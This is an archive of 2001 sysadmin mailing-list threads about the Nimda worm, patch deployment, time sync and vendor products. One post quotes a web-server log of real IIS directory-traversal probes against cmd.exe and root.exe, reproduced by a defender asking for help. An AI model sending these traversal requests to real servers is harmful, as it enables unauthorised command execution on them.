Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Mark Kelsay [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 11:35 AM
To: NT System Admin Issues
Subject: Nimda and HTML Files

I have read that nimda appends two lines of code to htm, html and asp files.
Does anyone know what those two lines of code are or where I can find out? 

TIA,

Mark Kelsay

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: How do you all do it?

[Clark, Steve]

AVIEN -  Knew about NIMDA within minutes of the first outbreak. Saw real
examples and recommendations within hours.

www.avien.org. It's $99 per year and includes paging service as well as
email notification for alerts.

Steve Clark
Clark Systems Support, LLC
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 10:43 AM
To: NT System Admin Issues
Subject: RE: How do you all do it?

Okay... I'll buy into that.  So, what other lists to you recommend?


_
Don Collier
Network Administrator
Intermap Technologies Inc.
Voice:  303-708-0955 x-207
Fax:303-708-0952
[EMAIL PROTECTED]
www.intermaptechnologies.com

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 4:29 PM
To: NT System Admin Issues
Subject: RE: How do you all do it?


I was going to say that.
There are some MAJOR advantages to being on these lists.
As an example, many of us knew about Nimda hours before anyone else did.
Granted we didn't have technical details or a name, but we knew there
was something bad happening and to start battening down the hatches. You
cant put a price on info like that.
I guarantee you, you sub to these lists, your knowledge will grow
exponentially, and you will look like a hero to your boss when you know
the S*&T is about to hit the fan well before anyone else does.

-Original Message-
From: Diane Beckham [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 3:26 PM
To: NT System Admin Issues
Subject: RE: How do you all do it?


Hey, this IS work.  Knowing about a virus BEFORE users tell us, is major
work

Diane

-Original Message-
From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 3:03 PM
To: NT System Admin Issues
Subject: How do you all do it?


I just joined this list today and am overwhelmed with email.  Almost 200
messages today.  How do you all keep up with this list and get any work
done?  (Not meant to imply anything)


_
Don Collier
Network Administrator
Intermap Technologies Inc.
Voice:  303-708-0955 x-207
Fax:303-708-0952
[EMAIL PROTECTED]
www.intermaptechnologies.com

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: IEAK again

[Clark, Steve]

Use Update Expert.
Load system agent on each PC
Sit at your desk, point to the PC and tell it to load IE 5.5 SP2 and reboot
at 9:30 PM
Go home.

Little simpler than download the IEAK. Get the customization code. Download
the IE 5.5 components, customize the settings to the environment. Test,
redo, test, test, test . Realize that the new overwrites everything from
the old. Get pissed and do it anyway. Recreate settings manually.

Been there, done that.

This way is a lot easier.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Luke Brumbaugh [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 8:46 AM
To: NT System Admin Issues
Subject: IEAK again

I have loaded IEAK and setup a configuration.  I have loaded all the updates
(sycronized)
Setup a little web page the automatically downloads the program with
instructions to open at current location etc.
Now I am at the point of testing, I built a test box and goto that webpage.
It loads and reboots, I check the build and not all the programs are loaded.
Is there a file or something I need to edit?My major objective is to get
all critical updates loaded, and loading all extras secondary.


Luke L. Brumbaugh
System Administrator, MCSE
Ultryx Corporation


Enterprise Channel Management Software for Manufacturers
Visit us at http://www.ultryx.com


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: How to remove Nimda from NT Server without a reload

[Clark, Steve]

I get a similar event when I run - it clears all icons in my system tray and
appears to restart EXPLORER then runs. Noticed it but didn't really take
note. Have you tried shutting down all services and running the app?

Good luck!

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Matthew Western [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:35 PM
To: NT System Admin Issues
Subject: RE: How to remove Nimda from NT Server without a reload

i've got the tool from commandcentral but that's crashing on NT server even
after i've (hopefully) disabled the virus from running by disabling all the
services that i can...

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Thursday, 20 September 2001 11:29 AM
To: NT System Admin Issues
Subject: RE: How to remove Nimda from NT Server without a reload


I heard from another list the Trend Micro has a new tool that removes and
corrects. CERT indicates there is no receovery.

Which way to go?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Matthew Western [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:59 PM
To: NT System Admin Issues
Subject: How to remove Nimda from NT Server without a reload

Any links on how to remove Nimda from NT without a reload?  when i run the
removal tool from this list it crashes...  any idea what services it
overwrites and runs as?  i've heard cmd.exe and mmc.exe.  we've got mmc.exe
running but when i try to kill it with task manager it says access denied...
ideas?
Matthew


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: How to remove Nimda from NT Server without a reload

[Clark, Steve]

I heard from another list the Trend Micro has a new tool that removes and
corrects. CERT indicates there is no receovery.

Which way to go?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Matthew Western [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:59 PM
To: NT System Admin Issues
Subject: How to remove Nimda from NT Server without a reload

Any links on how to remove Nimda from NT without a reload?  when i run the
removal tool from this list it crashes...  any idea what services it
overwrites and runs as?  i've heard cmd.exe and mmc.exe.  we've got mmc.exe
running but when i try to kill it with task manager it says access denied...
ideas?
Matthew


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: WARNING: Hacker Alert

[Clark, Steve]

In a follow up from this message, I contacted some senior people at Wcom/
UUNet this afternoon and asked about the validity of the attack from Wcom -
this was the first they had heard that.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Dean Cunningham [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 4:48 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

It targets the class A that your server is on and heavily targets the class
b your server is on.
If you are in a class a or b and that class is "owned" by the ISP, then more
than likely the other IPs  are used by dumb/uninformed home users

cheers
Dean

-Original Message-
From: Robert E Young - NetX [mailto:[EMAIL PROTECTED]]
Sent: Thursday, 20 September 2001 6:31 a.m.
To: NT System Admin Issues
Subject: Re: WARNING: Hacker Alert


Anything with 63 octet has the problem, I have heard it is due to a MCI
Worldcom attack.

I see you have the 63 octet.

Robert E, Young MCSE
C/S Systems Engineer
Dallas, TX USA

- Original Message -
From: "xylog" <[EMAIL PROTECTED]>
To: "NT System Admin Issues" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 09:45 AM
Subject: WARNING: Hacker Alert


All my public facing web servers at home and at my office have shown a
huge continuous hacking activity. Has anyone seen similar? I fear this
may be code red related or automated. Please comment if you have seen
similar. Here is an excerpt from one logfile:

63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70,
604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15,
80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
117, 0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15,
97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9

RE: NIMDA virus Help please

[Clark, Steve]

Ouch. Nothing like virus terrorism.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 4:35 PM
To: NT System Admin Issues
Subject: RE: NIMDA virus Help please

As others have stated, once you are infected, it's "Game over".  Wipe the
machine.  You should not try to "disinfect" the machine.

>From http://www.cert.org/body/advisories/CA200126_FA200126.html:

"The only safe way to recover from the system compromise is to format the
system drive(s) and reinstall the system software from trusted media (such
as vendor-supplied CD-ROM)."

-Original Message-
From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 3:28 PM
To: NT System Admin Issues
Subject: RE: NIMDA virus Help please


Fdisk

-Original Message-
From: Dawson, Valencia [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 4:29 PM
To: NT System Admin Issues
Subject: RE: NIMDA virus Help please


Then what will. I have the recent virus definition files which they said
would.

-Original Message-
From: Peter Pearson [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 4:18 PM
To: NT System Admin Issues
Subject: Re: NIMDA virus Help please


After you have been infected applying the patches and doing a virus scan
will not rid your system(s)
of the virus.

http://microsoft.com/technet/treeview/default.asp?url=/technet/security/topi
cs/Nimda.asp


- Original Message -
From: "Dawson, Valencia" <[EMAIL PROTECTED]>
To: "NT System Admin Issues" <[EMAIL PROTECTED]>
Sent: Wednesday, September 19, 2001 4:13 PM
Subject: NIMDA virus Help please



I will attempt to post another SOS and hope this is delivered this time.
After several attempts to get rid of this virus I am still not able to see
the back of it.
I installed the patches, did various virus scans and still I keep getting
the files with the html,nws and enc files being infected. This is happening
on the exchange server.
The intranet server seems to be clear of viruses but whereas users can
access the internet, they cannot access the intranet. The WWW and FTP
services have stopped and I cannot restart them.
Help please if you get this message.
Thank you in advance.


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: NIMDA virus Help please

[Clark, Steve]

Valencia,

What is your anti-virus program? Have you updated it to the latest? Have you
followed the guidelines set down by SARC or others to remove EML or NWS
files? If your server is infected, STOP all the services or you will not
eradicate it. Also, check out the removal tool from
http://www.centralcommand.com.

Email back if you have questions.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Dawson, Valencia [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 4:13 PM
To: NT System Admin Issues
Subject: NIMDA virus Help please


I will attempt to post another SOS and hope this is delivered this time.
After several attempts to get rid of this virus I am still not able to see
the back of it.
I installed the patches, did various virus scans and still I keep getting
the files with the html,nws and enc files being infected. This is happening
on the exchange server.
The intranet server seems to be clear of viruses but whereas users can
access the internet, they cannot access the intranet. The WWW and FTP
services have stopped and I cannot restart them.
Help please if you get this message.
Thank you in advance.


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Win2KPro Security updates

[Clark, Steve]

St Bernard Software - Update Expert. Email directly if you want more info.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Stefan Jafs [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 4:06 PM
To: NT System Admin Issues
Subject: Win2KPro Security updates

I have 40 Win2kPro workstations. How do I update all my systems without
having to update single systems with windows update?

Stefan

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Help for the Nimda virus

[Clark, Steve]

Agree that it's poor programming but - it's free. Maybe they will fix based
on input.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:36 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

I find it ironic that I had to use Explorer Search to find Searchit.

> -Original Message-
> From: Clark, Steve [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, September 19, 2001 9:29 AM
> To: NT System Admin Issues
> Subject: RE: Help for the Nimda virus
>
>
> Mod the shortcut to point to the windows dir and it works fine.
>
> Steve Clark
> Clark Systems Support, LLC
> AVIEN Charter Member
> www.clarksupport.com
>   301-610-9584 voice
>   240-465-0323 Efax
>
> -Original Message-
> From: Jim Busick [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, September 19, 2001 12:26 PM
> To: NT System Admin Issues
> Subject: RE: Help for the Nimda virus
>
> We appreciate the thought, but the tool does not install properly.
>
> > -Original Message-
> > From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
> > Sent: Wednesday, September 19, 2001 8:14 AM
> > To: NT System Admin Issues
> > Subject: RE: Help for the Nimda virus
> >
> >
> >
> >
> > > -Original Message-
> > > From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
> > > Sent: Wednesday, September 19, 2001 10:54 AM
> > > To: NT System Admin Issues
> > > Subject: RE: Help for the Nimda virus
> > >
> > >
> > > It also doesn't work.  I downloaded and installed it, and
> > it didn't even
> > > create an executable.
> >
> > That's not true actually.
> >
> > 1. It is FREE a production copy. The link is right on the
> > home page to the
> > right of the dancing tools.
> > 2. The search.exe file is in the c:\winnt\system32 directory.
> >
> > I didn't think it would be difficult to give something away. :0
> >
> > John
> >
> >
> > >
> > > -Original Message-
> > > From: Givens, Mike [mailto:[EMAIL PROTECTED]]
> > > Sent: Wednesday, September 19, 2001 10:51 AM
> > > To: NT System Admin Issues
> > > Subject: RE: Help for the Nimda virus
> > >
> > >
> > > define "free" the link provided only goes to a "trail"
> > version located in
> > > the downloads area ?
> > >
> > > -Original Message-
> > > From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
> > > Sent: Wednesday, September 19, 2001 9:50 AM
> > > To: NT System Admin Issues
> > > Subject: Help for the Nimda virus
> > >
> > >
> > >
> > >
> > > Previous email contained an incorrectly formatted URL.
> Try this one.
> > >
> > > If any one is interested: We are giving away FREE our
> > SearchIt program.
> > > SearchIt can search your logfiles, or any files, for text
> > strings you
> > > define. You can search for cmd.exe or tftp or any other piece of
> > > a virus or
> > > IIS exploit. SearchIt may be run via a scheduler and a
> > report of the found
> > > files is emailed to you.
> > >
> > > The FREE Download is at: http://www.serverautomationtools.com
> > >
> > > John Cesta
> > >
> > >
> > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> > >
> > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> > >
> > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> > >
> > >
> >
> >
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> >
>
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
>
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
>

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Help for the Nimda virus

[Clark, Steve]

Mod the shortcut to point to the windows dir and it works fine.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:26 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

We appreciate the thought, but the tool does not install properly.

> -Original Message-
> From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, September 19, 2001 8:14 AM
> To: NT System Admin Issues
> Subject: RE: Help for the Nimda virus
>
>
>
>
> > -Original Message-
> > From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
> > Sent: Wednesday, September 19, 2001 10:54 AM
> > To: NT System Admin Issues
> > Subject: RE: Help for the Nimda virus
> >
> >
> > It also doesn't work.  I downloaded and installed it, and
> it didn't even
> > create an executable.
>
> That's not true actually.
>
> 1. It is FREE a production copy. The link is right on the
> home page to the
> right of the dancing tools.
> 2. The search.exe file is in the c:\winnt\system32 directory.
>
> I didn't think it would be difficult to give something away. :0
>
> John
>
>
> >
> > -Original Message-
> > From: Givens, Mike [mailto:[EMAIL PROTECTED]]
> > Sent: Wednesday, September 19, 2001 10:51 AM
> > To: NT System Admin Issues
> > Subject: RE: Help for the Nimda virus
> >
> >
> > define "free" the link provided only goes to a "trail"
> version located in
> > the downloads area ?
> >
> > -Original Message-
> > From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
> > Sent: Wednesday, September 19, 2001 9:50 AM
> > To: NT System Admin Issues
> > Subject: Help for the Nimda virus
> >
> >
> >
> >
> > Previous email contained an incorrectly formatted URL. Try this one.
> >
> > If any one is interested: We are giving away FREE our
> SearchIt program.
> > SearchIt can search your logfiles, or any files, for text
> strings you
> > define. You can search for cmd.exe or tftp or any other piece of
> > a virus or
> > IIS exploit. SearchIt may be run via a scheduler and a
> report of the found
> > files is emailed to you.
> >
> > The FREE Download is at: http://www.serverautomationtools.com
> >
> > John Cesta
> >
> >
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> >
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> >
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> >
> >
>
>
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
>

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: net time

[Clark, Steve]

If you don't want to use W2K's utility - there are several freeware
utilities that will synch with Atomic clocks - D4 is an easy one.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Miley, Dan [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 11:01 AM
To: NT System Admin Issues
Subject: RE: net time

aren't there some timers to indicate how often to resynch the time.  Does
anyone know where these are. 

I know 2k does a lot more activity to make sure the time is set.  That can
mean more overhead on WAN links.

Shouldn't you use the name instead of the IP, in case you decide to move the
pdc?

Dan

"It is not the critic who counts; not the man who points out where the
strong man stumbled or where the doer of deeds could have done them better.
The credit belongs to the man who is actually in the arena, whose face is
marred with dust and sweat and blood. At best, he knows the triumph of high
achievement; if he fails, at least he fails while daring greatly, so that
his place shall never be with those cold and timid souls who knew neither
victory nor defeat."

Theodore Roosevelt
-Original Message-
From: Russ Braaten [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:05 AM
To: NT System Admin Issues
Subject: RE: net time


Actually, while working on this very topic today, I found out some
interesting issues.  My production domain is still NT4.  I have my PDC and
BDCs running timeserve and retrieving their time from a corporate
timeserver across our WAN (they have the actual internet connection).  and
my users, win95, 98, and a few win2k, run a login script that does a net
time \\xxx.xx.xxx.xxx /set using the ip address of our PDC.  While testing
a WIN2k server and workstation on a test domain, I noticed that the
workstation was syncing from the DC in my test domain, but the time was
way off from my production machine, so I started looking for how to sync
the time from the corporate time server across the WAN.  This turned out
to be a fairly simple process, once I found the instructions.  Run from a
command line "c:\net time /setsntp:xxx.xx.xxx." then cycle your
windows time service.  It actually writes to the registry where to look
for time syncing. This worked from both the server and pro box.  I pointed
them both to the corp box, but could have left the pro box syncing to the
DC and the DC syncing to the corp box, to minimize WAN traffic, which is
probably best practice, once rolled out.

Just thought someone out there might want to know,

Russ Braaten, MCSE, MCP+I


> Actually, that is what I have always done.  One of my associates pointed
out
> the effect of just using "net time /set" and I couldn't answer why we got
> the different results.  Just goes to show that browsing and NetBIOS is far
> from gone in W2K.
>
>
> ***
> Pete Carstensen, MCSE
> Senior LAN Engineer
> CSK Auto, Inc.
> 645 E. Missouri Ave.
> Phoenix,  AZ  85012
> (602) 631-7176
> [EMAIL PROTECTED]
>
> Little surprises around every corner, but nothing dangerous.
>   -- Willie Wonka
>
> -Original Message-
> From: Phil Pettifer [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 1:05 PM
> To: NT System Admin Issues
> Subject: RE: net time
>
> The simple answer is to hard code the name of the machine you want to use
> for network time into the script you are calling the command from...
>
> e.g.
> net time \\mypdc.mydomain.com /set
>
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 3:19 PM
> To: NT System Admin Issues
> Subject: Re: net time
>
>
> it seems like the net time command does not care about ntp service at all
> but
> queries the first alphabetical computer on a local subnet.  Does your
> proxy's
> NetBIOS name comes before your PDC name?
>
> Andrey Kalinin
>
>
>
>
>
> Please respond to "NT System Admin Issues"
>   <[EMAIL PROTECTED]>
>
>
>
>  To:  "NT System Admin Issues"
>   <[EMAIL PROTECTED]>
>
>  cc:  (bcc: Andrey Kalinin/FIS)
>
>
>
>  Subject: net time
>
>
>
>
>
>
> I have an interesting situation.
>
> Environment:  NT4 Domain, W2K Pro workstation.  PDC (NT4, SP6) set to be
the
> time server via "NET TIME /SETSNTP:PDC" at the workstation (verified via
> /querysntp)
> The PDC is running Windows Time Service (w32time) and is set as an NTP
> server.  It gets its time from a proxy server (W2KS) which has it's time
> updated from NIST.
>
> Anyway, at the W2KP station, if you type "net time /set" it points to the
> proxy server.  Why?  If you enter "net time /domain /set" it points to the
> PDC as well as when you do the /querysntp.
>
> All I can think of is that the "net time /set" command sees the ntp
service
> on the proxy server and reports connection to it.  Why is it not going to
> the PDC like it is told to d

RE: Server Monitoring Software

[Clark, Steve]

My point is that there are products that many people use that are
"advertised" on lists by tech's who use them. I firmly believe in St.
Bernard enough to put my company's name on the product and sell as part of
my solution. If I had deployed this before yesterday I don't think it would
have touched my servers in any of the offices. If someone had responded to
my posting list that weeks ago, I would have bought the software then rather
than wait.

Haven't you ever jumped off a bridge into the water? It's a lot of fun.

Regards,

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Rocky Stefano [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:01 AM
To: NT System Admin Issues
Subject: RE: Server Monitoring Software


Didn't you ever listen to your mom? If someone jumps off a bridge are you
going to follow? Obviously Tom didn't either.



-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: September 19, 2001 9:54 AM
To: NT System Admin Issues
Subject: RE: Server Monitoring Software



Hey Rocky?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Tom Carbone [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:45 AM
To: NT System Admin Issues
Subject: Server Monitoring Software

Omnitrend has begun shipping its new server monitoring product, ServScan.
Thanks go to all on this list who participated in the beta.

For details on this product, see
http://www.omnitrend.com/ServScan/ServScan.html

We've had so many positive comments and suggestions from members of this
list.  As such, we are offering a 15% discount on ServScan to all list
members who purchase the product before October 31, 2001.  Just mention
ntsysadmin when placing an order.

Thanks again, everyone!

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Server Monitoring Software

[Clark, Steve]

Hey Rocky?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Tom Carbone [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:45 AM
To: NT System Admin Issues
Subject: Server Monitoring Software

Omnitrend has begun shipping its new server monitoring product, ServScan.
Thanks go to all on this list who participated in the beta.

For details on this product, see
http://www.omnitrend.com/ServScan/ServScan.html

We've had so many positive comments and suggestions from members of this
list.  As such, we are offering a 15% discount on ServScan to all list
members who purchase the product before October 31, 2001.  Just mention
ntsysadmin when placing an order.

Thanks again, everyone!

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: WARNING: Hacker Alert

[Clark, Steve]

It's called St Bernard Software UpDate Expert. There is an agent that runs
on servers as well as workstations. The agent will query Db for updates and
actually download them for you. If you like the centralized approach, you
can run a console and tell what servers/ workstations get what updates. It's
very cool.

Please let me know if you have any more questions or would like pricing.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Bob's Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 1:29 AM
To: NT System Admin Issues
